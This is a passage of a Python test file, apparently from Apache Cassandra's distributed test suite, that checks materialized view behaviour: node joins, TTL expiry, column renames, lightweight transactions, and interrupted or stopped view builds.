assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
for i in range(10):
for j in range(100, 110):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
for i in range(10):
for j in range(110):
if j < 100 and (j % 10 == 0 or (j - 1) % 10 == 0):
assert_none(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j))
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j))
else:
assert_one(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
@pytest.mark.resource_intensive
def test_add_node_after_very_wide_mv(self):
"""
@jira_ticket CASSANDRA-11670
Test that very wide materialized views work as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v))")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(5):
for j in range(5000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
self.cluster.flush()
for i in range(5):
for j in range(5000):
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
node4 = new_node(self.cluster, data_center="dc1")
node4.set_configuration_options(values={'max_mutation_size_in_kb': 20}) # CASSANDRA-11670
logger.debug("Start join at {}".format(time.strftime("%H:%M:%S")))
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
for i in range(5):
for j in range(5000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
for i in range(5):
for j in range(5100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
for i in range(5):
for j in range(5100):
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
@pytest.mark.resource_intensive
def test_add_write_survey_node_after_mv(self):
"""
@jira_ticket CASSANDRA-10621
@jira_ticket CASSANDRA-10978
Test that materialized views work as expected when adding a node in write survey mode.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
node4 = new_node(self.cluster, data_center="dc1")
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true", "-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
for i in range(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def test_allow_filtering(self):
"""Test that allow filtering works as usual for a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
"WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))
for i in range(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {v}".format(v=i), [i, i, 'a', 3.0])
rows = list(session.execute("SELECT * FROM t_by_v2 WHERE v2 = 'a'"))
assert len(rows) == 1000, "Expected 1000 rows but got {}".format(len(rows))
assert_invalid(session, "SELECT * FROM t_by_v WHERE v = 1 AND v2 = 'a'")
assert_invalid(session, "SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = 1")
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {} AND v3 = 3.0 ALLOW FILTERING".format(i),
[i, i, 'a', 3.0]
)
assert_one(
session,
"SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = {} ALLOW FILTERING".format(i),
['a', i, i, 3.0]
)
def test_secondary_index(self):
"""Test that secondary indexes cannot be created on a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
assert_invalid(session, "CREATE INDEX ON t_by_v (v2)",
"Secondary indexes are not supported on materialized views")
def test_ttl(self):
"""
Test that TTL works as expected for a materialized view
@expected_result The TTL is propagated properly between tables.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 int, v3 int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
"WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))
for i in range(100):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, {v}, {v}) USING TTL 10".format(v=i))
for i in range(100):
assert_one(session, "SELECT * FROM t_by_v2 WHERE v2 = {}".format(i), [i, i, i, i])
time.sleep(20)
rows = list(session.execute("SELECT * FROM t_by_v2"))
assert len(rows) == 0, "Expected 0 rows but got {}".format(len(rows))
def test_query_all_new_column(self):
"""
Test that a materialized view created with a 'SELECT *' works as expected when adding a new column
@expected_result The new column is present in the view.
"""
session = self.prepare(user_table=True)
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
session.execute("ALTER TABLE users ADD first_name varchar;")
results = list(session.execute("SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'"))
assert len(results) == 1
assert hasattr(results[0], 'first_name'), 'Column "first_name" not found'
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, None, 'f', 'ch@ngem3a', None]
)
def test_query_new_column(self):
"""
Test that a materialized view created with 'SELECT <col1, ...>' works as expected when adding a new column
@expected_result The new column is not present in the view.
"""
session = self.prepare(user_table=True)
session.execute(("CREATE MATERIALIZED VIEW users_by_state2 AS SELECT state, username FROM users "
"WHERE STATE IS NOT NULL AND USERNAME IS NOT NULL PRIMARY KEY (state, username)"))
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1']
)
session.execute("ALTER TABLE users ADD first_name varchar;")
results = list(session.execute("SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'"))
assert len(results) == 1
assert not hasattr(results[0], 'first_name'), 'Column "first_name" found in view'
assert_one(
session,
"SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1']
)
def test_rename_column(self):
"""
Test that a materialized view created with a 'SELECT *' works as expected when renaming a column
@expected_result The column is also renamed in the view.
"""
session = self.prepare(user_table=True)
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
session.execute("ALTER TABLE users RENAME username TO user")
results = list(session.execute("SELECT * FROM users_by_state WHERE state = 'TX' AND user = 'user1'"))
assert len(results) == 1
assert hasattr(results[0], 'user'), 'Column "user" not found'
assert_one(
session,
"SELECT state, user, birth_year, gender FROM users_by_state WHERE state = 'TX' AND user = 'user1'",
['TX', 'user1', 1968, 'f']
)
def test_rename_column_atomicity(self):
"""
Test that column renaming is atomically done between a table and its materialized views
@jira_ticket CASSANDRA-12952
"""
session = self.prepare(nodes=1, user_table=True, install_byteman=True)
node = self.cluster.nodelist()[0]
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
# Rename a column with an injected byteman rule to kill the node after the first schema update
self.fixture_dtest_setup.allow_log_errors = True
script_version = '4x' if self.cluster.version() >= '4' else '3x'
node.byteman_submit(['./byteman/merge_schema_failure_{}.btm'.format(script_version)])
with pytest.raises(NoHostAvailable):
session.execute("ALTER TABLE users RENAME username TO user")
logger.debug('Restarting node')
node.stop()
node.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node, consistency_level=ConsistencyLevel.ONE)
# Both the table and its view should have the new schema after restart
assert_one(
session,
"SELECT * FROM ks.users WHERE state = 'TX' AND user = 'user1' ALLOW FILTERING",
['user1', 1968, 'f', 'ch@ngem3a', None, 'TX']
)
assert_one(
session,
"SELECT * FROM ks.users_by_state WHERE state = 'TX' AND user = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
def test_lwt(self):
"""Test that lightweight transaction behave properly with a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Inserting initial data using IF NOT EXISTS")
for i in range(1000):
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
)
self._replay_batchlogs()
logger.debug("All rows should have been inserted")
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug("Tyring to UpInsert data with a different value using IF NOT EXISTS")
for i in range(1000):
v = i * 2
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({id}, {v}, 'a', 3.0) IF NOT EXISTS".format(id=i, v=v)
)
self._replay_batchlogs()
logger.debug("No rows should have changed")
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug("Update the 10 first rows with a different value")
for i in range(1000):
v = i + 2000
session.execute(
"UPDATE t SET v={v} WHERE id = {id} IF v < 10".format(id=i, v=v)
)
self._replay_batchlogs()
logger.debug("Verify that only the 10 first rows changed.")
results = list(session.execute("SELECT * FROM t_by_v;"))
assert len(results) == 1000
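# Only ids 0-9 satisfied the IF v < 10 condition, so their view rows moved to v = id + 2000; all other rows keep v = id.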
for i in range(1000):
v = i + 2000 if i < 10 else i
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(v),
[v, i, 'a', 3.0]
)
logger.debug("Deleting the first 10 rows")
for i in range(1000):
v = i + 2000
session.execute(
"DELETE FROM t WHERE id = {id} IF v = {v} ".format(id=i, v=v)
)
self._replay_batchlogs()
logger.debug("Verify that only the 10 first rows have been deleted.")
results = list(session.execute("SELECT * FROM t_by_v;"))
assert len(results) == 990
for i in range(10, 1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
def test_interrupt_build_process(self):
"""Test that an interrupted MV build process is resumed as it should"""
options = {'hinted_handoff_enabled': False}
if self.cluster.version() >= '4':
options['concurrent_materialized_view_builders'] = 4
session = self.prepare(options=options, install_byteman=True)
node1, node2, node3 = self.cluster.nodelist()
logger.debug("Avoid premature MV build finalization with byteman")
for node in self.cluster.nodelist():
if self.cluster.version() >= '4':
node.byteman_submit(['./byteman/4.0/skip_view_build_finalization.btm'])
node.byteman_submit(['./byteman/4.0/skip_view_build_task_finalization.btm'])
else:
node.byteman_submit(['./byteman/pre4.0/skip_finish_view_build_status.btm'])
node.byteman_submit(['./byteman/pre4.0/skip_view_build_update_distributed.btm'])
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
logger.debug("Inserting initial data")
for i in range(10000):
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
)
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Stop the cluster. Interrupt the MV build process.")
self.cluster.stop()
logger.debug("Checking logs to verify that the view build tasks have been created")
for node in self.cluster.nodelist():
assert node.grep_log('Starting new view build', filename='debug.log')
assert not node.grep_log('Resuming view build', filename='debug.log')
node.mark_log(filename='debug.log')
logger.debug("Restart the cluster")
self.cluster.start()
session = self.patient_cql_connection(node1)
session.execute("USE ks")
logger.debug("MV shouldn't be built yet.")
assert len(list(session.execute("SELECT COUNT(*) FROM t_by_v"))) != 10000
logger.debug("Wait and ensure the MV build resumed. Waiting up to 2 minutes.")
self._wait_for_view("ks", "t_by_v")
logger.debug("Verify all data")
assert_one(session, "SELECT COUNT(*) FROM t_by_v", [10000])
for i in range(10000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.ALL
)
logger.debug("Checking logs to verify that some view build tasks have been resumed")
for node in self.cluster.nodelist():
assert node.grep_log('Resuming view build', filename='debug.log')
@pytest.mark.skip(reason="Frequently fails in CI. Skipping until fixed as tracked by CASSANDRA-14148")
@since('4.0')
def test_drop_while_building(self):
"""Test that a parallel MV build is interrupted when the view is removed"""
session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
logger.debug("Inserting initial data")
for i in range(5000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))
logger.debug("Slowing down MV build with byteman")
for node in self.cluster.nodelist():
node.byteman_submit(['./byteman/4.0/view_builder_task_sleep.btm'])
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Drop the MV while it is still building")
session.execute("DROP MATERIALIZED VIEW t_by_v")
logger.debug("Verify that the build has been stopped before its finalization without errors")
for node in self.cluster.nodelist():
self.check_logs_for_errors()
assert not node.grep_log('Marking view', filename='debug.log')
assert node.grep_log('Stopping current view builder due to schema change', filename='debug.log')
logger.debug("Verify that the view has been removed")
failed = False
try:
session.execute("SELECT COUNT(*) FROM t_by_v")
except InvalidRequest:
failed = True
assert failed, "The view shouldn't be queryable"
self._assert_view_meta(session, views=1, exists=False)
logger.debug("Create the MV again")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Verify that the MV has been successfully created")
self._wait_for_view('ks', 't_by_v')
assert_one(session, "SELECT COUNT(*) FROM t_by_v", [5000])
@since('4.0')
def test_drop_with_stopped_build(self):
"""Test that MV whose build has been stopped with `nodetool stop` can be dropped"""
session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
nodes = self.cluster.nodelist()
logger.debug("Inserting initial data")
for i in range(5000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))
logger.debug("Slowing down MV build with byteman")
for node in nodes:
node.byteman_submit(['./byteman/4.0/view_builder_task_sleep.btm'])
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Stopping all running view build tasks with nodetool")
for node in nodes:
node.watch_log_for('Starting new view build for range', filename='debug.log', timeout=120)
node.nodetool('stop VIEW_BUILD')
logger.debug("Checking logs to verify that some view build tasks have been stopped")
for node in nodes:
node.watch_log_for('Stopped build for view', filename='debug.log', timeout=120)
node.watch_log_for('Compaction interrupted: View build', filename='system.log', timeout=120)
self.check_logs_for_errors()
logger.debug("Drop the MV while it is still building")
session.execute("DROP MATERIALIZED VIEW t_by_v")
logger.debug("Verify that the build has been stopped before its finalization without errors")
for node in nodes:
self.check_logs_for_errors()
assert not node.grep_log('Marking view', filename='debug.log')
assert node.grep_log('Stopping current view builder due to schema change', filename='debug.log')
logger.debug("Verify that the view has been removed")
failed = False
try:
session.execute("SELECT COUNT(*) FROM t_by_v")
except InvalidRequest:
failed = True
assert failed, "The view shouldn't be queryable"
logger.debug("Create the MV again")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Verify that the MV has been successfully created")
self._wait_for_view('ks', 't_by_v')
assert_one(session, "SELECT COUNT(*) FROM t_by_v", [5000])
@since('4.0')
def test_resume_stopped_build(self):
"""Test that MV builds stopped with `nodetool stop` are resumed after restart"""
session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
nodes = self.cluster.nodelist()
logger.debug("Inserting initial data")
for i in range(5000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))
logger.debug("Slowing down MV build with byteman")
for node in nodes:
node.byteman_submit(['./byteman/4.0/view_builder_task_sleep.btm'])
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Stopping all running view build tasks with nodetool")
for node in nodes:
node.watch_log_for('Starting new view build for range', filename='debug.log', timeout=120)
node.nodetool('stop VIEW_BUILD')
logger.debug("Checking logs to verify that some view build tasks have been stopped")
for node in nodes:
node.watch_log_for('Stopped build for view', filename='debug.log', timeout=120)
node.watch_log_for('Compaction interrupted: View build', filename='system.log', timeout=120)
node.watch_log_for('Interrupted build for view', filename='debug.log', timeout=120)
assert not node.grep_log('Marking view', filename='debug.log')
self.check_logs_for_errors()
logger.debug("Check that MV shouldn't be built yet.")
assert len(list(session.execute("SELECT COUNT(*) FROM t_by_v"))) != 5000
logger.debug("Restart the cluster")
self.cluster.stop()
marks = [node.mark_log() for node in nodes]
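# Record the current log positions so that, after restart, only newly written 'Resuming view build' and 'Marking view' entries are matched.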
self.cluster.start()
session = self.patient_cql_connection(nodes[0])
logger.debug("Verify that the MV has been successfully created")
self._wait_for_view('ks', 't_by_v')
assert_one(session, "SELECT COUNT(*) FROM ks.t_by_v", [5000])
logger.debug("Checking logs to verify that the view build has been resumed and completed after restart")
for node, mark in zip(nodes, marks):
assert node.grep_log('Resuming view build', filename='debug.log', from_mark=mark)
assert node.grep_log('Marking view', filename='debug.log', from_mark=mark)
self.check_logs_for_errors()
@since('3.0')
def test_mv_with_default_ttl_with_flush(self):
self._test_mv_with_default_ttl(True)
@since('3.0')
def test_mv_with_default_ttl_without_flush(self):
self._test_mv_with_default_ttl(False)
def _test_mv_with_default_ttl(self, flush):
"""
Verify mv with default_time_to_live can be deleted properly using expired livenessInfo
@jira_ticket CASSANDRA-14071
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1, node2, node3 = self.cluster.nodelist()
session.execute('USE ks')
logger.debug("MV with same key and unselected columns")
session.execute("CREATE TABLE t2 (k int, a int, b int, c int, primary key(k, a)) with default_time_to_live=600")
session.execute(("CREATE MATERIALIZED VIEW mv2 AS SELECT k,a,b FROM t2 "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (a, k)"))
session.cluster.control_connection.wait_for_schema_agreement()
self.update_view(session, "UPDATE t2 SET c=1 WHERE k=1 AND a=1;", flush)
assert_one(session, "SELECT k,a,b,c FROM t2", [1, 1, None, 1])
assert_one(session, "SELECT k,a,b FROM mv2", [1, 1, None])
self.update_view(session, "UPDATE t2 SET c=null WHERE k=1 AND a=1;", flush)
assert_none(session, "SELECT k,a,b,c FROM t2")
assert_none(session, "SELECT k,a,b FROM mv2")
self.update_view(session, "UPDATE t2 SET c=2 WHERE k=1 AND a=1;", flush)
assert_one(session, "SELECT k,a,b,c FROM t2", [1, 1, None, 2])
assert_one(session, "SELECT k,a,b FROM mv2", [1, 1, None])
self.update_view(session, "DELETE c FROM t2 WHERE k=1 AND a=1;", flush)
assert_none(session, "SELECT k,a,b,c FROM t2")
assert_none(session, "SELECT k,a,b FROM mv2")
if flush:
self.cluster.compact()
assert_none(session, "SELECT * FROM t2")
assert_none(session, "SELECT * FROM mv2")
# test with user-provided ttl
self.update_view(session, "INSERT INTO t2(k,a,b,c) VALUES(2,2,2,2) USING TTL 5", flush)
self.update_view(session, "UPDATE t2 USING TTL 100 SET c=1 WHERE k=2 AND a=2;", flush)
self.update_view(session, "UPDATE t2 USING TTL 50 SET c=2 WHERE k=2 AND a=2;", flush)
self.update_view(session, "DELETE c FROM t2 WHERE k=2 AND a=2;", flush)
time.sleep(5)
assert_none(session, "SELECT k,a,b,c FROM t2")
assert_none(session, "SELECT k,a,b FROM mv2")
if flush:
self.cluster.compact()
assert_none(session, "SELECT * FROM t2")
assert_none(session, "SELECT * FROM mv2")
logger.debug("MV with extra key")
session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int) with default_time_to_live=600")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
session.cluster.control_connection.wait_for_schema_agreement()
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1);", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, 1])
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 2, 1);", flush)
assert_one(session, "SELECT * FROM t", [1, 2, 1])
assert_one(session, "SELECT * FROM mv", [1, 2, 1])
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 3, 1);", flush)
assert_one(session, "SELECT * FROM t", [1, 3, 1])
assert_one(session, "SELECT * FROM mv", [1, 3, 1])
if flush:
self.cluster.compact()
assert_one(session, "SELECT * FROM t", [1, 3, 1])
assert_one(session, "SELECT * FROM mv", [1, 3, 1])
# user provided ttl
self.update_view(session, "UPDATE t USING TTL 50 SET a = 4 WHERE k = 1", flush)
assert_one(session, "SELECT * FROM t", [1, 4, 1])
assert_one(session, "SELECT * FROM mv", [1, 4, 1])
self.update_view(session, "UPDATE t USING TTL 40 SET a = 5 WHERE k = 1", flush)
assert_one(session, "SELECT * FROM t", [1, 5, 1])
assert_one(session, "SELECT * FROM mv", [1, 5, 1])
self.update_view(session, "UPDATE t USING TTL 30 SET a = 6 WHERE k = 1", flush)
assert_one(session, "SELECT * FROM t", [1, 6, 1])
assert_one(session, "SELECT * FROM mv", [1, 6, 1])
if flush:
self.cluster.compact()
assert_one(session, "SELECT * FROM t", [1, 6, 1])
assert_one(session, "SELECT * FROM mv", [1, 6, 1])
@flaky
@since('3.0')
def test_no_base_column_in_view_pk_complex_timestamp_with_flush(self):
self._test_no_base_column_in_view_pk_complex_timestamp(flush=True)
@pytest.mark.skip(reason="Frequently fails in CI. Skipping until fixed as tracked by CASSANDRA-14148")
@since('3.0')
def test_no_base_column_in_view_pk_complex_timestamp_without_flush(self):
self._test_no_base_column_in_view_pk_complex_timestamp(flush=False)
def _test_no_base_column_in_view_pk_complex_timestamp(self, flush):
"""
Able to shadow an old view row if all base columns, including unselected ones, are removed.
Able to recreate the view row if at least one selected column is alive.
@jira_ticket CASSANDRA-11500
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1, node2, node3 = self.cluster.nodelist()
session.execute('USE ks')
session.execute("CREATE TABLE t (k int, c int, a int, b int, e int, f int, primary key(k, c))")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT k,c,a,b FROM t "
"WHERE k IS NOT NULL AND c IS NOT NULL PRIMARY KEY (c, k)"))
session.cluster.control_connection.wait_for_schema_agreement()
# update unselected, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 1 SET e=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, 1, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# remove unselected, add selected column, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET e=null, b=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, 1, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, 1])
# remove selected column, view row is removed
self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET e=null, b=null WHERE k=1 AND c=1;", flush)
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
# update unselected with ts=3, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET f=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# insert livenessInfo, view row should be alive
self.update_view(session, "INSERT INTO t(k,c) VALUES(1,1) USING TIMESTAMP 3", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# remove unselected, view row should be alive because of base livenessInfo alive
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET f=null WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# add selected column, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET a=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
# update unselected, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET f=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
# delete with ts=3, view row should be alive due to unselected@ts4
self.update_view(session, "DELETE FROM t USING TIMESTAMP 3 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# remove unselected, view row should be removed
self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET f=null WHERE k=1 AND c=1;", flush)
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
# add selected with ts=7, view row is alive
self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET b=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, 1, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, 1])
# remove selected with ts=7, view row is dead
self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET b=null WHERE k=1 AND c=1;", flush)
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
# add selected with ts=5, view row is alive (selected columns should not affect each other)
self.update_view(session, "UPDATE t USING TIMESTAMP 5 SET a=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
# add selected with ttl=20 (we apparently need a long ttl because the flushing etc that self.update_view does can take a long time)
self.update_view(session, "UPDATE t USING TTL 20 SET a=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
time.sleep(20)
# update unselected with ttl=20, view row should be alive
self.update_view(session, "UPDATE t USING TTL 20 SET f=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
time.sleep(20)
# after the unselected column's TTL expires, both the base row and the view row are gone
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
@since('3.0')
def test_base_column_in_view_pk_complex_timestamp_with_flush(self):
self._test_base_column_in_view_pk_complex_timestamp(flush=True)
@since('3.0')
def test_base_column_in_view_pk_complex_timestamp_without_flush(self):
self._test_base_column_in_view_pk_complex_timestamp(flush=False)
def _test_base_column_in_view_pk_complex_timestamp(self, flush):
"""
Able to shadow old view row with column ts greater than pk's ts and re-insert the view row
Able to shadow old view row with column ts smaller than pk's ts and re-insert the view row
@jira_ticket CASSANDRA-11500
"""
